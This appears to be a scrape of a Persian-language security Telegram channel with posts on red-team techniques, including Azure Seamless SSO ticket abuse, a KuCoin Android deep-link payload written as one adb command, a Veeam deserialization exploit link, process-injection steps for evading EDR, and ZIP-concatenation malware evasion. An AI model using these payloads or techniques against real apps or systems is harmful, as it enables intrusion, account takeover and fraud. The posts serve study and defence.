⭕️ Pynt یک پلتفرم تست امنیتی API است که به توسعهدهندگان و تیمهای امنیتی کمک میکند تا امنیت API ها را به صورت خودکار و در مراحل اولیه توسعه، ارزیابی و تضمین کنند. این پلتفرم به طور ویژه برای پوشش خلأ های امنیتی API طراحی شده و ویژگیهای منحصربهفردی را برای این منظور ارائه میدهد.
از ویژگی های آن:
خودکارسازی تستهای امنیتی API:
Context-Aware Testing:
Zero False Positives:
پشتیبانی از OWASP Top 10 و لیستهای امنیتی دیگر:
ادغام با ابزارهای توسعه و CI/CD:
ارائه گزارشهای کامل و Remediation Paths:
پشتیبانی از انواع مختلف API ها:
#AppSec #APISecurity
@securation
از ویژگی های آن:
خودکارسازی تستهای امنیتی API:
Pynt به ما این امکان را میدهد تا تستهای امنیتی را به صورت خودکار بر روی API ها اجرا کنید. این تستها بر اساس سناریوهای واقعی حمله مانند تزریق کد و حملات scraping اجرا میشوند و از این طریق به شناسایی و رفع آسیبپذیریها قبل از تولید کمک میکنند.
Context-Aware Testing:
Pynt از تحلیلهای مختلف برای درک بهتر کارکردهای خاص API ها و نحوه تعامل آنها با فرآیندهای تجاری استفاده میکند. این قابلیت کمک میکند تا آسیبپذیریهای خاصی که ممکن است در تستهای استاندارد نادیده گرفته شوند، شناسایی شوند.
Zero False Positives:
یکی از مواردی که ادعا کرده این ابزار دقت بالای آن در تشخیص آسیبپذیریها بدون ایجاد خطا است.
پشتیبانی از OWASP Top 10 و لیستهای امنیتی دیگر:
با استفاده از استانداردهای OWASP و سایر استاندارد های امنیتی،اقدام به بررسی میکند.
ادغام با ابزارهای توسعه و CI/CD:
این پلتفرم به راحتی با ابزارهای محبوب توسعه API مانند Postman و BurpSuite و سیستمهای CI/CD ادغام میشود، که به توسعهدهندگان امکان میدهد امنیت API ها را بهصورت مستقیم در جریان توسعه بررسی کنند.
ارائه گزارشهای کامل و Remediation Paths:
گزارشهای کاملی از آسیبپذیریها همراه با پیشنهادات رفع مشکل و تیکتهای خودکار ارائه میدهد که این فرآیند را برای تیمهای امنیتی و توسعهدهندگان سادهتر میکند.
پشتیبانی از انواع مختلف API ها:
از انواع مختلف API ها شامل REST، SOAP، و GraphQL پشتیبانی میکند، و با توجه به نیازهای خاص هر نوع API، تستهای مربوطه را انجام میدهد.
در آخر میتوان در نسخه های trial و تجاری از آن استفاده کرد.
#AppSec #APISecurity
@securation
www.pynt.io
Pynt: Effortless API Security Testing
Pynt offers dynamic API security testing for developers and testers to identify and fix vulnerabilities during the development lifecycle.
⭕️ اگر به ساختار Azure و ارتباط معماری های On-perm با آن رجوع کرده باشید، خواهید دانست که سرویس Seamless SSO با استفاده از تیکت های Kerberos Active Directory محلی اقدام به دسترسی Azure و سرویس 365 میکند.
در ادامه این سرویس با استفاده از تیکت ارسال شده یک Computer Account به اسم AZUREADSSOACC با SPN های خاص ایجاد میکند،
که در زمان Validate شدن با Entra ID server مورد استفاده قرار میگیرد.
حال اگر با دیدگاه RedTeam به آن دقت کنیم متوجه چند مورد خواهیم شد:
در ادامه با دسترسی به محیط مربوطه با استفاده از ROADTools و AADInternals میتوان اقدام به Enumeration و Exploitation کرد.
#RedTeam #Azure #Cloud
@securation
در ادامه این سرویس با استفاده از تیکت ارسال شده یک Computer Account به اسم AZUREADSSOACC با SPN های خاص ایجاد میکند،
که در زمان Validate شدن با Entra ID server مورد استفاده قرار میگیرد.
حال اگر با دیدگاه RedTeam به آن دقت کنیم متوجه چند مورد خواهیم شد:
در صورت نبود Credential به شکل Clear-text، ما به سه شکل میتوانیم با استفاده از این تکنیک و ابزار SeamlessPass به دسترسی برسیم:
در حالت اول ما TGT یا KRBTGT را دارا هستیم که با Golden,Diamond,و ازین قبیل حملات، اقدام به تولید TGS میکنیم و ادامه ماجرا.
در حالت دوم ما NTML Hash و یا AES key را دارا هستیم، که اقدام به دریافت TGT و TGS میکنیم و ادامه ماجرا.
و در حالت سوم ما NTLM Hash و AES Key اکانت AZUREADSSOACC که پیش تر صحبت شد را دارا هستیم، که میتوان TGS تولید کند و بدون هیچ تعاملی با DC، در Azure احراز هویت کند.
در ادامه با دسترسی به محیط مربوطه با استفاده از ROADTools و AADInternals میتوان اقدام به Enumeration و Exploitation کرد.
#RedTeam #Azure #Cloud
@securation
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ اکسپلویت DeepLink و جاوا اسکریپت اینترفیس و بدست آوردن دسترسی غیرمجاز در اپ اندروید صرافی کوکوین
در این حمله اتکر توانایی باز کردن پوزیشن ترید و همچنین بستن ترید های باز داخل اپ اندرویدی را تنها با کلیک کردن بر روی یک لینک بدست می آورد
📎 BlogPost
@Securation
#Android
در این حمله اتکر توانایی باز کردن پوزیشن ترید و همچنین بستن ترید های باز داخل اپ اندرویدی را تنها با کلیک کردن بر روی یک لینک بدست می آورد
adb shell am start -d 'kucoin:///link?data=\<noscript\>document.write\(\"\<iframe src=https://www.example.com style=position:fixed;top:0;left:0;width:100%;height:100%;border:none;\>\<\/iframe\>\"\)\;\</noscript\>'
📎 BlogPost
@Securation
#Android
Forwarded from کانال بایت امن
Media is too big
VIEW IN TELEGRAM
#Course #DWORD
🖥 ویدیو معرفی دوره برنامه نویسی تهاجمی مختص به تیم های قرمز
📊 بررسی کامل دوره، سرفصل ها و موضوعاتی که در هر فصل بیان خواهند شد.
⏰ آخرین بروزرسانی سرفصل ها : 18 September 2024
🖥 شهریه دوره ۱۵,۰۰۰,۰۰۰ تومان است که با ۲۰٪ تخفیف به ۱۰ نفر اول ارائه میشود.
📑 همچنین، امکان پرداخت به صورت اقساط نیز فراهم است.
🖥 نحوه شرکت در دوره :
به دلیل ظرفیت محدود کلاس، اولویت ثبتنام با دانشجویانی است که آزمون تعیین سطح را گذرانده باشند. چنانچه پیشنیازهای لازم برای شرکت در دوره را ندارید، همچنان میتوانید در دوره شرکت کنید، اما ابتدا باید این پیشنیازها را بگذرانید. جهت دریافت اطلاعات بیشتر به آیدی @YMahmoudnia پیغام بدین.
🦅 کانال بایت امن | گروه بایت امن
_
به دلیل ظرفیت محدود کلاس، اولویت ثبتنام با دانشجویانی است که آزمون تعیین سطح را گذرانده باشند. چنانچه پیشنیازهای لازم برای شرکت در دوره را ندارید، همچنان میتوانید در دوره شرکت کنید، اما ابتدا باید این پیشنیازها را بگذرانید. جهت دریافت اطلاعات بیشتر به آیدی @YMahmoudnia پیغام بدین.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️ به تازگی یک آسیبپذیری در نسخههای 12.1.2.172 و قدیمیتر نرمافزار Veeam Backup شناسایی شده که منجر به RCE از طریق Deserialization و دور زدن مکانیزمهای امنیتی میشود.
نرمافزار Veeam در ارتباطات خود به DotNet Remoting متکی است که یک API برای ارتباطات IPC و گاهی RPC به حساب میآید. در این ارتباطات، برای Serialize کردن دادهها، دو روش موجود است، اما در Veeam از روش BinaryFormatter استفاده میشود.
آسیبپذیری اصلی در کلاس CBinaryServerFormatterSink رخ میدهد که به دلیل عدم اعتبارسنجی مناسب نوع ورودیها، امکان سوءاستفاده از آن وجود دارد.
هرچند کلاسهای CWhitelist و CBlacklist برای جلوگیری از مشکلات Deserialization طراحی شدهاند، اما این آسیبپذیری به دلیل Misconfiguration در این کلاسها قابل دور زدن است.
این مسئله در نهایت به ترکیب این کلاسهای آسیبپذیر با سایر اجزای سیستم منجر به RCE میشود.
همچنین، برای دور زدن احراز هویت و دسترسی به پیامهای ارسالی در کانال ارتباطی، از Interface IServerChannelSink استفاده میشود که بخشی از زیرساخت DotNet Remoting است.
https://github.com/watchtowrlabs/CVE-2024-40711
#RedTeam #vulnerability_Analysis #Exploitation
@securation
نرمافزار Veeam در ارتباطات خود به DotNet Remoting متکی است که یک API برای ارتباطات IPC و گاهی RPC به حساب میآید. در این ارتباطات، برای Serialize کردن دادهها، دو روش موجود است، اما در Veeam از روش BinaryFormatter استفاده میشود.
آسیبپذیری اصلی در کلاس CBinaryServerFormatterSink رخ میدهد که به دلیل عدم اعتبارسنجی مناسب نوع ورودیها، امکان سوءاستفاده از آن وجود دارد.
هرچند کلاسهای CWhitelist و CBlacklist برای جلوگیری از مشکلات Deserialization طراحی شدهاند، اما این آسیبپذیری به دلیل Misconfiguration در این کلاسها قابل دور زدن است.
این مسئله در نهایت به ترکیب این کلاسهای آسیبپذیر با سایر اجزای سیستم منجر به RCE میشود.
همچنین، برای دور زدن احراز هویت و دسترسی به پیامهای ارسالی در کانال ارتباطی، از Interface IServerChannelSink استفاده میشود که بخشی از زیرساخت DotNet Remoting است.
https://github.com/watchtowrlabs/CVE-2024-40711
#RedTeam #vulnerability_Analysis #Exploitation
@securation
GitHub
GitHub - watchtowrlabs/CVE-2024-40711: Pre-Auth Exploit for CVE-2024-40711
Pre-Auth Exploit for CVE-2024-40711. Contribute to watchtowrlabs/CVE-2024-40711 development by creating an account on GitHub.
Forwarded from Security Analysis
دوستان عزیز گروه تبادل دانش امنیت اطلاعات لینکش اینه :
https://news.1rj.ru/str/DarkPwners
لطفا قبل شروع گفتگو یا ارسال مطلب ، قوانین گروه رو مطالعه کنید.
https://news.1rj.ru/str/DarkPwners
لطفا قبل شروع گفتگو یا ارسال مطلب ، قوانین گروه رو مطالعه کنید.
Telegram
Security Analysis Group
گروه تبادل دانش امنیت اطلاعات
Forwarded from کانال بایت امن
This media is not supported in your browser
VIEW IN TELEGRAM
#Session
🖥 ویدیو جلسه اول | "دوره برنامه نویسی تهاجمی"
⏰ مدت زمان :5 دقیقه
🔗 لینک دانلود مستقیم
💠 فصل اول : Offensive Programming: Core Concepts
⬅️ تعریف برنامه نویسی تهاجمی
⬅️ اهداف، تکنیک ها و مهارت های مورد نیاز برنامه نویسی تهاجمی
⬅️ هدف اصلی دوره
🦅 کانال بایت امن | گروه بایت امن
_
_
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from کانال بایت امن
Media is too big
VIEW IN TELEGRAM
#Session
🖥 ویدیو جلسه دوم | "دوره برنامه نویسی تهاجمی"
⏰ مدت زمان :30 دقیقه
🔗 لینک دانلود مستقیم
💠 فصل اول : Offensive Programming: Core Concepts
⬅️ چه زبان برنامهنویسی برای برنامهنویسی تهاجمی مناسب است؟
⬅️ بررسی موارد و فاکتورهای انتخاب زبان برنامهنویسی
⬅️ بررسی یک زبان برنامهنویسی از ابعاد General، Technical و Special Usage
⬅️ بررسی دو مورد مهم از دید مکانیسمهای امنیتی در جهت تحلیل باینریها
⬅️ دموی بررسی نحوه فراخوانی یک API و ارتباط آن با جداول Import
🦅 کانال بایت امن | گروه بایت امن
_
_
Please open Telegram to view this post
VIEW IN TELEGRAM
Media is too big
VIEW IN TELEGRAM
⭕️ حل چالش مهندسی معکوس اپلیکیشن اندروید با موبایل.
چالش Milad Tower در مسابقات Olympics CTF
#Reverse #Android #CTF
#OlympicCTF
@Securation
چالش Milad Tower در مسابقات Olympics CTF
#Reverse #Android #CTF
#OlympicCTF
@Securation
Writeups_OlympicsPwners.pdf
1.9 MB
⭕️رایت آپ چالشهای حل شده توسط تیم OlympicsPwners تیم دوم مسابقات کشوری Olympics CTF که توسط معاونت علمی ریاست جمهوری برگزار شد.
@securation
@securation
Forwarded from کانال بایت امن
Media is too big
VIEW IN TELEGRAM
#Session
🖥 ویدیو جلسه سوم | "دوره برنامه نویسی تهاجمی"
⏰ مدت زمان :15 دقیقه
🔗 لینک دانلود مستقیم
💠 فصل اول : Offensive Programming: Core Concepts
⬅️ مروری بر مفاهیم Red Team و Red Teaming
⬅️ آشنایی با مفهوم Attack Life Cycle
⬅️ بررسی مدل Cyber Kill Chain
⬅️ بررسی مدل Mandiant
⬅️ ارتباط برنامهنویسی تهاجمی و Attack Life Cycle
⬅️ ارائه یک سناریو مبتنی بر مدل Cyber Kill Chain
⬅️ درک مفهوم TTP و تحلیل یک سناریو واقعی بر اساس TTP
⬅️ معرفی مختصر Mitre، LOLBAS، و LOLDrivers
🦅 کانال بایت امن | گروه بایت امن
_
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️ Exploiting Deeplink via XSS Lead To ATO in South Korea's biggest mobile chat app
@Securation
#Android #DeepLink #XSS #ATO
رایت اپ One Click Exploit XSS To ATO و نحوه اکسپلویت شدن نرم افزار مسنجر اندرویدی kakaoTalk کره جنوبی که امکان سرقت Access Token و استخراج همه ی گفتگوها را برای هکر فراهم میکند.
باگ موجود برطرف شده است، اما گزارشگر باگ پاداشی دریافت نکرده است، چرا که فقط کره ای ها واجد شرایط دریافت جایزه هستند!!!
📎 BlogPost: Link
@Securation
#Android #DeepLink #XSS #ATO
Forwarded from کانال بایت امن
#Tools
HE - Hardware Read & Write utility is a powerful utility for hardware engineers, BIOS engineers, driver developers, QA engineers, performance test engineers, diagnostic engineers… etc.
با استفاده از این ابزار به طیف گسترده ایی از سخت افزار دسترسی خواهید داشت. HE یک ابزار قدرتمند برای مهندسین سختافزار، مهندسین BIOS، توسعهدهندگان درایور، مهندسین کنترل کیفیت (QA)، مهندسین تست عملکرد و مهندسین عیبیابی است.
دسترسی به سخت افزارهایی همچون :
PCI (PCI Express), PCI Index/Data, Memory, Memory Index/Data, I/O Space, I/O Index/Data, Super I/O, DIMM SPD, CPU MSR Registers, S.M.A.R.T monitor, HDD physical sector , ATA Identify Data, ACPI Tables Dump, ACPI AML Code Disassemble, Embedded Controller, USB Information, SMBIOS Structures, PCI Option ROMs and MP Configuration Table.
🦅 کانال بایت امن | گروه بایت امن
_
HE - Hardware Read & Write utility is a powerful utility for hardware engineers, BIOS engineers, driver developers, QA engineers, performance test engineers, diagnostic engineers… etc.
با استفاده از این ابزار به طیف گسترده ایی از سخت افزار دسترسی خواهید داشت. HE یک ابزار قدرتمند برای مهندسین سختافزار، مهندسین BIOS، توسعهدهندگان درایور، مهندسین کنترل کیفیت (QA)، مهندسین تست عملکرد و مهندسین عیبیابی است.
دسترسی به سخت افزارهایی همچون :
PCI (PCI Express), PCI Index/Data, Memory, Memory Index/Data, I/O Space, I/O Index/Data, Super I/O, DIMM SPD, CPU MSR Registers, S.M.A.R.T monitor, HDD physical sector , ATA Identify Data, ACPI Tables Dump, ACPI AML Code Disassemble, Embedded Controller, USB Information, SMBIOS Structures, PCI Option ROMs and MP Configuration Table.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️ اگر به برنامهنویسی و امنیت بازیها علاقهمند هستید، وبسایت Awesome Game Security اطلاعات مفیدی در این زمینه به صورت منظم و یکپارچه ارائه میدهد. این وبسایت شامل دستهبندیهایی همچون Anti-Cheat، Cheat، Game Development، Game Engines، و مباحثی مانند OpenGL، DirectX، Vulkan، و Web3 Games است.
#Security #Game
@Securation
#Security #Game
@Securation
Pentesting Active Directory
⭕️مجموعه مقالات تست نفوذ اکتیو دایرکتوری
Trees, Forest and Trust Relations
Access Control, Users, KRGBT, Golden ticket attack
Recon with AD Module, Bloodhound, PowerView & Adalanche
LLMNR Poisoning
Lateral Movement, Privilege Escalation & Tools
#Pentest #ActiveDirectory
@Securation
⭕️مجموعه مقالات تست نفوذ اکتیو دایرکتوری
Trees, Forest and Trust Relations
Access Control, Users, KRGBT, Golden ticket attack
Recon with AD Module, Bloodhound, PowerView & Adalanche
LLMNR Poisoning
Lateral Movement, Privilege Escalation & Tools
#Pentest #ActiveDirectory
@Securation
Early Cascade Injection
⭕️ یکی از تکنیکهای شناخته شده و موثر جهت تزریق کد به پروسس است که شامل تزریق کد قبل از اجرای نقطه ورودی اصلی (Main Entry Point) پروسس میباشد. این تکنیک در سال 2018 توسط Cyberbit کشف شد و یکی از تکنیک های موثر در بایپس کردن EDR هاست.
مراحلی که در این پیاده سازی طی میشود :
#ProcessInjection #EDR
@Securation
⭕️ یکی از تکنیکهای شناخته شده و موثر جهت تزریق کد به پروسس است که شامل تزریق کد قبل از اجرای نقطه ورودی اصلی (Main Entry Point) پروسس میباشد. این تکنیک در سال 2018 توسط Cyberbit کشف شد و یکی از تکنیک های موثر در بایپس کردن EDR هاست.
مراحلی که در این پیاده سازی طی میشود :
Create a target process in suspended state (e.g. CreateProcess);
Allocate writeable memory in the target process (e.g. VirtualAllocEx);
Write malicious code to the allocated memory (e.g. WriteProcessMemory);
Queue an APC to the remote target process, the APC points to the malicious code (e.g. QueueUserAPC);
Resume the target process, upon resumption the APC is executed, running the malicious code (e.g. ResumeThread).
لینک کامل مقاله
#ProcessInjection #EDR
@Securation
❤2
SharpADWS
⭕️ یک ابزار شناسایی و بهرهبرداری از Active Directory برای تیمهای قرمز (Red Teams) است که با استفاده از پروتکل Active Directory Web Services (ADWS) دادههای Active Directory را جمعآوری و تغییر میدهد.
معمولا جمع آوری اطلاعات به واسطه پروتکل LDAP انجام میشود اما SharpADWS توانایی جمع آوری اطلاعات را بدون ارتباط مستقیم با سرور LDAP دارد.
#ActiveDirectory #REDTEAM
@Securation
⭕️ یک ابزار شناسایی و بهرهبرداری از Active Directory برای تیمهای قرمز (Red Teams) است که با استفاده از پروتکل Active Directory Web Services (ADWS) دادههای Active Directory را جمعآوری و تغییر میدهد.
معمولا جمع آوری اطلاعات به واسطه پروتکل LDAP انجام میشود اما SharpADWS توانایی جمع آوری اطلاعات را بدون ارتباط مستقیم با سرور LDAP دارد.
#ActiveDirectory #REDTEAM
@Securation
GitHub
GitHub - wh0amitz/SharpADWS: Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services…
Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS). - wh0amitz/SharpADWS
⭕️ هکرها از تکنیک ترکیب فایل ZIP برای هدف قرار دادن سیستمهای ویندوزی استفاده میکنند تا Payloadهای مخرب را در آرشیوهای فشرده قرار دهند، بدون اینکه راهکارهای امنیتی متوجه آن شوند.
این تکنیک از تفاوت در نحوه پردازش فایلهای ترکیبی ZIP توسط تحلیلگرهای ZIP و نرمافزارهای مدیریت آرشیو سوءاستفاده میکند.
این روند جدید توسط Perception Point شناسایی شد، که در هنگام تحلیل یک حمله فیشینگ که کاربران را با یک اطلاعیه جعلی ارسال کالا فریب میداد، یک آرشیو ZIP ترکیبی حاوی یک تروجان را کشف کرد.
#News #Hack #RedTeam
@Securation
این تکنیک از تفاوت در نحوه پردازش فایلهای ترکیبی ZIP توسط تحلیلگرهای ZIP و نرمافزارهای مدیریت آرشیو سوءاستفاده میکند.
این روند جدید توسط Perception Point شناسایی شد، که در هنگام تحلیل یک حمله فیشینگ که کاربران را با یک اطلاعیه جعلی ارسال کالا فریب میداد، یک آرشیو ZIP ترکیبی حاوی یک تروجان را کشف کرد.
🌐Hackers now use ZIP file concatenation to evade detection
#News #Hack #RedTeam
@Securation
⭕️ در این پست، تجربیات شخصی نویسنده به اشتراک گذاشته شده است؛ او به دلیل نیاز به دسترسی به Discord مجبور شد DNS و ساختار VPN را یاد بگیرد. تمامی ابزارها و اپلیکیشنهایی که استفاده کرده را دیباگ کرده و اطلاعات جالبی درباره امنیت VPNها به دست آورده است.
Can't trust any VPN these days
#VPN #DNS
@Securation
در 9 اکتبر 2024، Discord در ترکیه به دلیل اتهامات جنایی مختلف ممنوع شد.
Can't trust any VPN these days
#VPN #DNS
@Securation
blog.orhun.dev
Can't trust any VPN these days - Orhun's Blog
FOSS • Linux • Programming